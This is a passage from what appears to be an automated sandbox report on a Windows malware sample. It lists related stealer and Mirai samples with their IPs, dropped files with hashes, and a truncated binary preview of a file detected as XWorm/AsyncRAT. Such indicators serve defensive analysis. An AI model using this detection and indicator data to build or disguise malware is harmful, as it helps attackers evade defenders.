                                                                • ip-api.com/line/?fields=hosting
                                                                b83NG35487.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                • ip-api.com/line/?fields=hosting

                                                                Domains

                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                ip-api.comJjUCGUKdtX.exeGet hashmaliciousUnknownBrowse
                                                                • 208.95.112.1
                                                                file.exeGet hashmaliciousAmadey, Discord Token Stealer, DotStealer, LummaC Stealer, Stealc, VidarBrowse
                                                                • 208.95.112.1
                                                                T9R663ZHsf.exeGet hashmaliciousDCRatBrowse
                                                                • 208.95.112.1
                                                                file.exeGet hashmaliciousDiscord Token Stealer, DotStealerBrowse
                                                                • 208.95.112.1
                                                                https://www.collage.inc/Get hashmaliciousUnknownBrowse
                                                                • 208.95.112.2
                                                                7Zur2FiS0p.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 208.95.112.1
                                                                Hlx2hL1z8B.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 208.95.112.1
                                                                KqJ1zWlHp1.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 208.95.112.1
                                                                zwW6sDt6hU.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                                                • 208.95.112.1
                                                                Eemw0Iqp2J.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                • 208.95.112.1

                                                                ASNs

                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                CLOUDFLARENETUS1733325245efb540ba670bc87cda05695e7839c909eeca3e1633b495d258461820ead14a47442.dat-decoded.exeGet hashmaliciousUnknownBrowse
                                                                • 172.67.211.47
                                                                https://larester.es/rhude/Odrivex/Get hashmaliciousUnknownBrowse
                                                                • 104.16.124.96
                                                                file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                • 188.114.97.6
                                                                rOJS25YL2e.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                • 104.21.67.152
                                                                file.exeGet hashmaliciousLummaC StealerBrowse
                                                                • 188.114.96.6
                                                                Uii3leknna.exeGet hashmaliciousUnknownBrowse
                                                                • 172.67.146.84
                                                                Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                • 104.21.7.245
                                                                https://dejahag.r.tsp1-brevo.net/tr/cl/KmGd9A1qqSlrOj2z__X25j5HoX7GCHGh0hX68Ejr3MLOr6zBgWSV3EWc4RbCw4ZZiVYjLC-PzxJdl0d2AFII_wRC4M3nzB9ceIDoUxWLGU4ptWLKsXN_B1kGiCF4WvrX94vTVpdbOblvTJTQlDmB3Q-QymvZdRYMQX9kefXxoLT_yIgedcG3oCW18dq3lTB1Raf_otB-yM1td6JPh8uR6e4fHKowec0Y4DKkm-UGJA8Xy3SelJ-z0r2e_0RzSj-TLkScHGtnP2gFC9kxWgEQ0LKuGet hashmaliciousUnknownBrowse
                                                                • 172.64.150.216
                                                                FwhEhTLFjX.lnkGet hashmaliciousUnknownBrowse
                                                                • 172.67.146.84
                                                                Uii3leknna.exeGet hashmaliciousUnknownBrowse
                                                                • 104.21.63.142
                                                                TUT-ASUSJjUCGUKdtX.exeGet hashmaliciousUnknownBrowse
                                                                • 208.95.112.1
                                                                file.exeGet hashmaliciousAmadey, Discord Token Stealer, DotStealer, LummaC Stealer, Stealc, VidarBrowse
                                                                • 208.95.112.1
                                                                T9R663ZHsf.exeGet hashmaliciousDCRatBrowse
                                                                • 208.95.112.1
                                                                file.exeGet hashmaliciousDiscord Token Stealer, DotStealerBrowse
                                                                • 208.95.112.1
                                                                http://flcu.phGet hashmaliciousUnknownBrowse
                                                                • 162.252.214.4
                                                                https://www.collage.inc/Get hashmaliciousUnknownBrowse
                                                                • 208.95.112.2
                                                                7Zur2FiS0p.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 208.95.112.1
                                                                Hlx2hL1z8B.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 208.95.112.1
                                                                KqJ1zWlHp1.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 208.95.112.1
                                                                zwW6sDt6hU.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                                                • 208.95.112.1
                                                                SKB-ASSKBroadbandCoLtdKRx86.elfGet hashmaliciousMiraiBrowse
                                                                • 175.122.183.142
                                                                x86.elfGet hashmaliciousMiraiBrowse
                                                                • 114.202.170.6
                                                                xd.x86.elfGet hashmaliciousMiraiBrowse
                                                                • 211.208.163.66
                                                                sora.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                • 123.213.250.138
                                                                sora.mips.elfGet hashmaliciousMiraiBrowse
                                                                • 211.211.211.191
                                                                la.bot.arm5.elfGet hashmaliciousMiraiBrowse
                                                                • 175.116.163.145
                                                                la.bot.m68k.elfGet hashmaliciousMiraiBrowse
                                                                • 118.223.49.5
                                                                la.bot.mipsel.elfGet hashmaliciousMiraiBrowse
                                                                • 58.123.120.147
                                                                mipsel.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                • 218.239.158.160
                                                                arm5.nn-20241201-1515.elfGet hashmaliciousMirai, OkiruBrowse
                                                                • 175.124.162.146

                                                                JA3 Fingerprints

                                                                No context

                                                                Dropped Files

                                                                No context

                                                                Created / dropped Files

                                                                C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                                Download File
                                                                Process:C:\Windows\System32\svchost.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):1310720
                                                                Entropy (8bit):0.8492253094402288
                                                                Encrypted:false
                                                                SSDEEP:1536:gJhkM9gB0CnCm0CQ0CESJPB9JbJQfvcso0l1T4MfzzTi1FjIIXYvjbglQdmHDugP:gJjJGtpTq2yv1AuNZRY3diu8iBVqF9
                                                                MD5:587FA7936C62A7F149150A4F07CE526F
                                                                SHA1:93982F3801011639F556BE17D23914956812017A
                                                                SHA-256:83DEACE21E9159F3A8718F091BB2225A0FC3C808B2690A2B0CF8A65EC50467A3
                                                                SHA-512:1E72AAD011112A9C51AE778159E77F2E0AAF9E3A757704A9CAE0EAFE0C8E878E941872B4EA0D5CA4A77E4D43F1CD9DB0ED800766144EA342F57A4CD659F0B351
                                                                Malicious:false
                                                                Preview:...M........@..@.-...{5..;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................4..........E.[.rXrX.#.........`h.................h.5.......3.....X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

                                                                C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                Download File
                                                                Process:C:\Windows\System32\svchost.exe
                                                                File Type:Extensible storage engine DataBase, version 0x620, checksum 0xa7566a5e, page size 16384, DirtyShutdown, Windows version 10.0
                                                                Category:dropped
                                                                Size (bytes):1310720
                                                                Entropy (8bit):0.658570138078501
                                                                Encrypted:false
                                                                SSDEEP:1536:JSB2ESB2SSjlK/rv5rO1T1B0CZSJRYkr3g16P92UPkLk+kAwI/0uzn10M1Dn/di6:Jaza9v5hYe92UOHDnAPZ4PZf9h/9h
                                                                MD5:54A3AFF972443BEC8FB076D0AD90E7DA
                                                                SHA1:9579014F77415DB72DB8A3E430148A222327994D
                                                                SHA-256:8D19ACF14C69BB8DE1FB4D613689D42821B04AB35EBD2065D10C3C6D974D64D8
                                                                SHA-512:5F31A593DA352013F0787D47275C1D8E7193E8771F176DF01B0F3983F6F3CFB4283CA1073ED83C399799AD9E85012378ACB6525ED9D25E3702FE734FD08E33F5
                                                                Malicious:false
                                                                Preview:.Vj^... ...............X\...;...{......................0.z..........{..1....|/.h.|.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........-...{5..............................................................................................................................................................................................2...{....................................1....|O..................yi.1....|/..........................#......h.|.....................................................................................................................................................................................................................................................................................................................................................

                                                                C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                                Download File
                                                                Process:C:\Windows\System32\svchost.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):16384
                                                                Entropy (8bit):0.08130676124721575
                                                                Encrypted:false
                                                                SSDEEP:3:Xml/8Yejz3GGuAJkhvekl1LU8qh3ctAllrekGltll/SPj:2t8zjz3GrxlZUlEAJe3l
                                                                MD5:F7482938F8DBA6A3A8E112E4E7E50E0C
                                                                SHA1:169F69E684848BA8C84739E6F80193026FDFD50F
                                                                SHA-256:60058CFB851AD6DF3461C234E7DE32F79622BF0A5D8C05C8DFA0F059529A0CBE
                                                                SHA-512:CB33EAB2E850280F55DBA89DBA89F12630AE5CA384FF10163093A8042D9E579106E3373F6C64D2A1076D1BAE8D38AF5B791B53FEFBC532D6F3EE599E982C85E1
                                                                Malicious:false
                                                                Preview:..C......................................;...{..1....|/......{...............{.......{...XL......{...................yi.1....|/.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\wininit.exe.log

                                                                Download File
                                                                Process:C:\Users\user\AppData\Roaming\wininit.exe
                                                                File Type:CSV text
                                                                Category:dropped
                                                                Size (bytes):654
                                                                Entropy (8bit):5.380476433908377
                                                                Encrypted:false
                                                                SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                                                MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                                                SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                                                SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                                                SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                                                Malicious:false
                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..

                                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):64
                                                                Entropy (8bit):0.34726597513537405
                                                                Encrypted:false
                                                                SSDEEP:3:Nlll:Nll
                                                                MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                Malicious:false
                                                                Preview:@...e...........................................................

                                                                C:\Users\user\AppData\Local\Temp\BIT6DEB.tmp

                                                                Download File
                                                                Process:C:\Windows\System32\svchost.exe
                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):77824
                                                                Entropy (8bit):6.071663313968177
                                                                Encrypted:false
                                                                SSDEEP:1536:uWm/qYqZp1parEfel1tQ7ScRM40bwnssq5lV6R14OdHZtdDS:uiXBQeOcG40bwwPOh9S
                                                                MD5:DC8534F103A3167CEC27B4B01FEA89A4
                                                                SHA1:8B4326CD0F572F0FFFA42B2E94739E9D756BD7F0
                                                                SHA-256:11F65837861268603D19266A62AD2C1876D5CFE33540704860FD7AFE27A476E1
                                                                SHA-512:61A8CE5C6ABD24C50558A8D1708F94275AC1ACBE166D6502F5FB22711A9056D1E95725C66677B631E97AB14F8D0AB6DFC086442302D7990E8DAC5CDBCA3C57B1
                                                                Malicious:true
                                                                Yara Hits:
                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\BIT6DEB.tmp, Author: Joe Security
                                                                • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\BIT6DEB.tmp, Author: Joe Security
                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\BIT6DEB.tmp, Author: ditekSHen
                                                                Antivirus:
                                                                • Antivirus: Avira, Detection: 100%
                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                • Antivirus: ReversingLabs, Detection: 92%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....6g.................$...........C... ...`....@.. ....................................@.................................TC..W....`..F............................................................................ ............... ..H............text....#... ...$.................. ..`.rsrc...F....`.......&..............@..@.reloc..............................@..B.................C......H........m..........&.....................................................(....*.r...p*. .t..*..(....*.r...p*. *p{.*.s.........s.........s.........s.........*.rO..p*. ..e.*.r...p*. ....*.r(..p*. .]b.*.rZ..p*. ....*.r...p*. .!..*..((...*.r...p*. (...*.r...p*. . ..*.(+...-.(,...,.+.(-...,.+.(*...,.+.()...,..(Z...*"(....+.*&($...&+.*.+5sk... .... .'..ol...(,...~....-.(_...(Q...~....om...&.-.*.r...p*. w...*.r2..p*. E/..*.rd..p*. E...*.r...p*. ...*.r...p*. .8F.*.r...p*. .(T.*.r,.

                                                                C:\Users\user\AppData\Local\Temp\Log.tmp

                                                                Download File
                                                                Process:C:\Users\user\AppData\Local\Temp\wininit.exe
                                                                File Type:Generic INItialization configuration [WIN]
                                                                Category:modified
                                                                Size (bytes):58
                                                                Entropy (8bit):3.598349098128234
                                                                Encrypted:false
                                                                SSDEEP:3:rRSFYJKXzovNsr42VjFYJKXzovX:EFYJKDoWr5FYJKDoP
                                                                MD5:5362ACB758D5B0134C33D457FCC002D9
                                                                SHA1:BC56DFFBE17C015DB6676CF56996E29DF426AB92
                                                                SHA-256:13229E0AD721D53BF9FB50FA66AE92C6C48F2ABB785F9E17A80E224E096028A4
                                                                SHA-512:3FB6DA9993FBFC1DC3204DC2529FB7D9C6FE4E6F06E6C8E2DC0BE05CD0E990ED2643359F26EC433087C1A54C8E1C87D02013413CE8F4E1A6D2F380BE0F5EB09B
                                                                Malicious:false
                                                                Preview:....### explorer ###..[WIN]r[WIN]....### explorer ###..r

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1feyxm0q.cro.psm1

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2z4zq3rp.5w3.psm1

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a30rvqoc.odu.ps1

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cc0cta14.52s.ps1

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dtdntybc.4z2.psm1

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hl0gwvzv.mf3.psm1

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i4gtiglr.t1k.psm1

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iq1wcscg.1vm.psm1

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nmwncoxi.3m4.ps1

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nxkclg35.bhy.ps1

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ouzzbcoy.nhh.ps1

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_plkspola.jyh.ps1

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q0nnqezv.y2u.ps1

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q3ldg355.jyw.psm1

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wq0grskw.lew.psm1

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xm5knxtn.xrk.ps1

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
